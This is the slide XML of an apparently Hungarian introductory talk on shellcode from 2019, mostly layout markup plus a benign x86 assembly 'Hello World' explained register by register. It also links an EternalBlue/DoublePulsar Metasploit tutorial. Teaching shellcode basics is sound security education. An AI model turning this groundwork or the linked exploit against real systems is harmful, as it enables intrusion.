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4" r:id="rId4"/>
    <p:sldMasterId id="2147483695" r:id="rId5"/>
    <p:sldMasterId id="214748369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y="5143500" cx="9144000"/>
  <p:notesSz cx="6858000" cy="9144000"/>
  <p:embeddedFontLst>
    <p:embeddedFont>
      <p:font typeface="Montserra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Montserrat-bold.fntdata"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide3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6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5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6eb0862ac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6eb0862ac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994e6d58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994e6d58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5994e6d586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5994e6d586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994e6d586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5994e6d586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994e6d586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994e6d586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994e6d586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5994e6d586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599e4b6717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599e4b6717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99e4b671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99e4b671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99e4b671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599e4b671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599e4b671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599e4b671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599e4b671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599e4b671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b70e1f04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b70e1f04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99e4b6717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99e4b6717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56eb0862ac_0_315:notes"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:ph idx="2" type="sldImg"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381300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56eb0862ac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599e4b671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599e4b671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599e4b6717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599e4b6717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56eb0862ac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56eb0862ac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b70e1f04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b70e1f04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Pelda: jogosultsagszerzes, kodfuttatas, informacioszivargas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https://www.c0d3xpl0it.com/2017/05/eternalblue-doublepulsar-exploit-in-metasploit.html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994e6d586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994e6d586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b70e1f04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b70e1f04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b70e1f04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b70e1f04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b70e1f04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b70e1f04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99e4b671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99e4b671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b70e1f04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b70e1f04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0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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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1.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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jpg"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image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9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Relationship Id="rId3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Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image9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png"/><Relationship Id="rId3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8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6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png"/><Relationship Id="rId3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32806" y="1500638"/>
            <a:ext cx="3654600" cy="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232806" y="2419125"/>
            <a:ext cx="3675300" cy="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distraction">
  <p:cSld name="TITLE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1" cy="51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29200"/>
            <a:ext cx="611955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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="3337716"/>
            <a:ext cx="5476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with kids">
  <p:cSld name="TITLE_1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6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b="8201" l="0" r="0" t="8193"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5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611955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525538" y="2309016"/>
            <a:ext cx="5476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an driving">
  <p:cSld name="TITLE_1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7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 flipH="1">
            <a:off x="1" y="0"/>
            <a:ext cx="914421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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="2309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with family">
  <p:cSld name="TITLE_1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" name="Google Shape;82;p18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" name="Google Shape;84;p18"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="39" r="29" t="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35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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="3452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kids in back seat">
  <p:cSld name="TITLE_1_1_1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9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 rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7813" l="0" r="0" t="7813"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-1" y="0"/>
            <a:ext cx="91442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07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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="39092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an driving">
  <p:cSld name="TITLE_1_1_1_1_1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20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20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20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2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136" y="2200500"/>
            <a:ext cx="462649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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526136" y="2309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teaching teen">
  <p:cSld name="TITLE_1_1_1_1_1_1_1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1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1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1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21"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7763" l="0" r="0" t="7763"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="514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49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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="32234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an smiling">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1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22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22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 rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3976" l="0" r="0" t="3976"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-4" y="0"/>
            <a:ext cx="9144005" cy="5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404" y="2200500"/>
            <a:ext cx="417822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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5022986" y="2309025"/>
            <a:ext cx="4030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en hands in air">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1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23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3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3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23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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="23090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teens driving">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1_1_1_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24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4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2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7847" l="0" r="0" t="7856"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="91442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34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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="26519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en driving">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1_1_1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25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2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10007" l="0" r="0" t="9999"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="91442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34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type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="26519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>
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1_1_1_1_1_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6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457211" y="1600200"/>
            <a:ext cx="82299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6479" y="3030632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e column" type="secHead">
  <p:cSld name="SECTION_HEAD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4" name="Google Shape;154;p2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7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wo column" type="tx">
  <p:cSld name="TITLE_AND_BOD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1" name="Google Shape;161;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="1238194"/>
            <a:ext cx="35883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2" name="Google Shape;162;p28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046649" y="1238194"/>
            <a:ext cx="35883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3" name="Google Shape;163;p2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TITLE_AND_BODY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0" name="Google Shape;170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1" name="Google Shape;17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TITLE_AND_BODY_1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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-64775" y="-86375"/>
            <a:ext cx="9306000" cy="5311500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="4154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31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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4229100" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E14504">
              <a:alpha val="84710"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2331725" lIns="342900" spcFirstLastPara="1" rIns="342900" wrap="square" tIns="102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792" y="383850"/>
            <a:ext cx="1570707" cy="23236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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232806" y="1500638"/>
            <a:ext cx="3654600" cy="9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5" name="Google Shape;185;p33"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="232806" y="2419125"/>
            <a:ext cx="3675300" cy="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distraction">
  <p:cSld name="TITLE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34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" name="Google Shape;18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1" cy="514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29200"/>
            <a:ext cx="611955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/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="3337716"/>
            <a:ext cx="5476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with kids">
  <p:cSld name="TITLE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3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5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3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2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="8201" l="0" r="0" t="8193"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5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611955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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="2309016"/>
            <a:ext cx="5476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an driving">
  <p:cSld name="TITLE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6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3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" name="Google Shape;205;p36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 flipH="1">
            <a:off x="1" y="0"/>
            <a:ext cx="914421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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="2309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with family">
  <p:cSld name="TITLE_1_1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3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7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3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7"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="39" r="29" t="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435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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="3452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kids in back seat">
  <p:cSld name="TITLE_1_1_1_1_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38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3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2" name="Google Shape;222;p38"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7813" l="0" r="0" t="7813"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-1" y="0"/>
            <a:ext cx="91442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07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>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="39092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an driving">
  <p:cSld name="TITLE_1_1_1_1_1_1_1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3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39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3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39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2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136" y="2200500"/>
            <a:ext cx="462649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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526136" y="23090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mom teaching teen">
  <p:cSld name="TITLE_1_1_1_1_1_1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" name="Google Shape;235;p40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0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40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40"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7763" l="0" r="0" t="7763"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144002" cy="514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14900"/>
            <a:ext cx="528384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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="3223425"/>
            <a:ext cx="45012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an smiling">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1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41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41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41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p41"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="3976" l="0" r="0" t="3976"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="-4" y="0"/>
            <a:ext cx="9144005" cy="514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404" y="2200500"/>
            <a:ext cx="417822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 txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5022986" y="2309025"/>
            <a:ext cx="40305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en hands in air">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1_1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42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2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42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p42"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="5555" r="5555" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="914423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05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2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="23090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teens driving">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1_1_1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43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3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43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43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="7847" l="0" r="0" t="7856"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="91442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34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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="26519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vider women driving">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1_1_1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4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44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4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44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0" name="Google Shape;270;p44"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="10007" l="0" r="0" t="9999"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="914422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43400"/>
            <a:ext cx="5622460" cy="74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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="525538" y="2651925"/>
            <a:ext cx="4968600" cy="52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">
  <p:cSld name="TITLE_1_1_1_1_1_1_1_1_1_1_1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4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45"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="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5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 txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457211" y="1600200"/>
            <a:ext cx="82299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4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0" name="Google Shape;28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6479" y="3030632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one column" type="secHead">
  <p:cSld name="SECTION_HEADER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None/>
              <a:defRPr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83" name="Google Shape;283;p46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46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46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6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d Header Bullets">
  <p:cSld name="SECTION_HEADER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47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47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2" name="Google Shape;292;p47"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="322750" y="1002600"/>
            <a:ext cx="84534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indent="-3429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 sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr indent="-3429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1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr indent="-3429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5pPr>
            <a:lvl6pPr indent="-3429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 sz="1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr indent="-3429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1800">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr indent="-3429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8pPr>
            <a:lvl9pPr indent="-3429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Char char="■"/>
              <a:defRPr sz="1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two column" type="tx">
  <p:cSld name="TITLE_AND_BODY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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="-1"/>
            <a:ext cx="9144300" cy="828600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E14504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8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6" name="Google Shape;296;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="1238194"/>
            <a:ext cx="35883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7" name="Google Shape;297;p48"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5046649" y="1238194"/>
            <a:ext cx="35883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8" name="Google Shape;298;p48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48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TITLE_AND_BODY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49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="568176" y="4800804"/>
            <a:ext cx="26895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CONFIDENTIAL &amp; PROPRIETARY | TRUEMOTION, INC.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79" name="Google Shape;17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480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/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4229100" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E14504">
              <a:alpha val="84710"/>
            </a:srgbClr>
          </a:solidFill>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="2331725" lIns="342900" spcFirstLastPara="1" rIns="342900" wrap="square" tIns="1028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50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="225400" y="1945500"/>
            <a:ext cx="38673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rPr b="1"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SMS méretű atombomba, avagy shellcode alapszinten</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="2400">
              <a:solidFill>
                <a:srgbClr val="FFFFFF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"/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Jozsef Ottucsak</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (@fuzboxz)</a:t>
            </a:r>
            <a:endParaRPr sz="1400">
              <a:solidFill>
                <a:schemeClr val="lt1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</a:rPr>
              <a:t>June </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>201</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="lt1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>9</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="310" name="Google Shape;31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792" y="383850"/>
            <a:ext cx="1570707" cy="232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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810800" y="1262500"/>
            <a:ext cx="1069500" cy="3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&amp;msg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5" name="Google Shape;385;p59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Példa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>- Hello World</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="386" name="Google Shape;386;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311704" y="1238200"/>
            <a:ext cx="45612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global _start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_start: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ecx, msg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msg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edx, len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msg length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bl, 0x1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stdout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al, 0x4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sys_write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int 0x80 	 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start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section .data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msg db 'Helo, world!',0xa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len equ $ - msg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7" name="Google Shape;387;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68463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ECX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8" name="Google Shape;388;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47417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9" name="Google Shape;389;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="57940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EBX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0" name="Google Shape;390;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="78986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ECX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91" name="Google Shape;391;p59"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="388" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5240950" y="1680625"/>
            <a:ext cx="0" cy="58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2" name="Google Shape;392;p59"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="389" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293250" y="1730425"/>
            <a:ext cx="0" cy="5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3" name="Google Shape;393;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="384" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7345550" y="1654300"/>
            <a:ext cx="0" cy="60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4" name="Google Shape;394;p59"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8397850" y="1730500"/>
            <a:ext cx="0" cy="5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5" name="Google Shape;395;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624750" y="1288975"/>
            <a:ext cx="1232400" cy="3918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ys_write (0x4)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6" name="Google Shape;396;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5780950" y="1338700"/>
            <a:ext cx="1069500" cy="3918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stdout fd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(0x1)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7" name="Google Shape;397;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7863100" y="1356613"/>
            <a:ext cx="1069500" cy="3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sg length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8" name="Google Shape;398;p59"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421050" y="2974325"/>
            <a:ext cx="998400" cy="391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 0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="399" name="Google Shape;399;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="388" idx="2"/>
            <a:endCxn id="398" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5240950" y="2755825"/>
            <a:ext cx="16794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00" name="Google Shape;400;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="389" idx="2"/>
            <a:endCxn id="398" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293250" y="2755825"/>
            <a:ext cx="6270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01" name="Google Shape;401;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="387" idx="2"/>
            <a:endCxn id="398" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6920150" y="2755825"/>
            <a:ext cx="4254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02" name="Google Shape;402;p59"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="390" idx="2"/>
            <a:endCxn id="398" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6920350" y="2755825"/>
            <a:ext cx="14775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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6810800" y="1262500"/>
            <a:ext cx="1069500" cy="3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&amp;msg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8" name="Google Shape;408;p60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Pelda</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> - Hello World</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="409" name="Google Shape;409;p60"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311704" y="1238200"/>
            <a:ext cx="45612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global _start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_start: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ecx, msg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msg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edx, len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msg length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bl, 0x1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stdout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al, 0x4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sys_write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int 0x80 	 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start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section .data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msg db 'Helo, world!',0xa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len equ $ - msg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0" name="Google Shape;410;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="68463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ECX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1" name="Google Shape;411;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="47417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2" name="Google Shape;412;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="57940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EBX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3" name="Google Shape;413;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7898650" y="2263825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ECX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14" name="Google Shape;414;p60"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="411" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5240950" y="1680625"/>
            <a:ext cx="0" cy="58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5" name="Google Shape;415;p60"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="412" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6293250" y="1730425"/>
            <a:ext cx="0" cy="5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6" name="Google Shape;416;p60"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="407" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7345550" y="1654300"/>
            <a:ext cx="0" cy="60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7" name="Google Shape;417;p60"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8397850" y="1730500"/>
            <a:ext cx="0" cy="5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18" name="Google Shape;418;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4624750" y="1288975"/>
            <a:ext cx="1232400" cy="3918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sys_write (0x4)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9" name="Google Shape;419;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5780950" y="1338700"/>
            <a:ext cx="1069500" cy="3918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stdout fd (0x1)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20" name="Google Shape;420;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7863100" y="1356613"/>
            <a:ext cx="1069500" cy="3918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msg length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21" name="Google Shape;421;p60"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6421050" y="2974325"/>
            <a:ext cx="998400" cy="391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 0x80</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="422" name="Google Shape;422;p60"/>
